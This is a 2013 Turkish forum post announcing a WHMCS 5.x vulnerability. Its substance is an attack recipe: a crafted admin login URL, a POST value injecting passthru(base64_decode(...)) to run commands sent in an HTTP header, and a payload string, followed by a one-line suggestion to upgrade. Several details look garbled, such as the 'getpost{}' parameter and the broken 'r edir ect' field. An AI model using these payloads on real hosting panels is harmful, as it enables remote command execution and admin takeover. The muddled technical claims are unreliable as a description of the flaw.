IRCForumları - IRC ve mIRC Kullanıcılarının Buluşma Noktası
  sohbet

Etiketlenen Kullanıcılar

Yeni Konu aç Cevapla
 
LinkBack Seçenekler Stil
Alt 22 Ağustos 2013, 12:12   #1
Çevrimdışı
Kullanıcıların profil bilgileri misafirlere kapatılmıştır.
IF Ticaret Sayısı: (0)
IF Ticaret Yüzdesi:(%)
whmcs 5.x güvenlik açığı




whmcs 5.0 sürümünde bir güvenlik açığı mevcut, ancak 5.1'de önbellek güvenlik eklentisi eklendi.

http://site.com/whmcs/admin/login.php?correct&cache=1?login=getpost{}

eğer önbellek doğrulama yok ise (5.0 sürümünde eksik) sayfa yüklenmeye çalışacak ve tamper data veya benzeri bir modül ile POST_SESSION değeri aşağıdaki gibi değiştirildiğinde yönetici sayfası açılacaktır.

POST: $post(login=1);passthru(base64_decode(\$_SERVER[HTTP_CMD]))&login_cancel;die;";

PAYLOAD: $payload = "login=1&title=1&execorder=0&hook=urlencoded&r edir ect={admin_index}";

şuan için olası çözüm olarak sürüm yükseltilebilir ve admin panel yolu değiştirilebilir,

 
Alıntı ile Cevapla

IRCForumlari.NET Reklamlar
sohbet odaları eglen sohbet Mobil Chat
Cevapla

Etiketler
5x, açığı, güvenlik, whmcs


Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)
 

Yetkileriniz
Konu Acma Yetkiniz Yok
Cevap Yazma Yetkiniz Yok
Eklenti Yükleme Yetkiniz Yok
Mesajınızı Değiştirme Yetkiniz Yok

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodu Kapalı
Trackbacks are Kapalı
Pingbacks are Açık
Refbacks are Açık


Benzer Konular
Konu Konuyu Başlatan Forum Cevaplar Son Mesaj
Yok böyle güvenlik açığı! Zen Bilim Dünyasından Son Haberler 0 19 Kasım 2012 14:09
İşlemcide güvenlik açığı! Dilara Güvenlik Açıkları 0 23 Mart 2009 13:34
Explorer'da Güvenlik Açığı.. Dilara Güvenlik Açıkları 0 26 Aralık 2008 10:50
DNS Güvenlik Açığı Ocean Güvenlik Açıkları 2 07 Ağustos 2008 09:30
Güvenlik Açığı MSN'yi Karıştırdı DoStNaMe Güvenlik Açıkları 0 09 Haziran 2005 15:10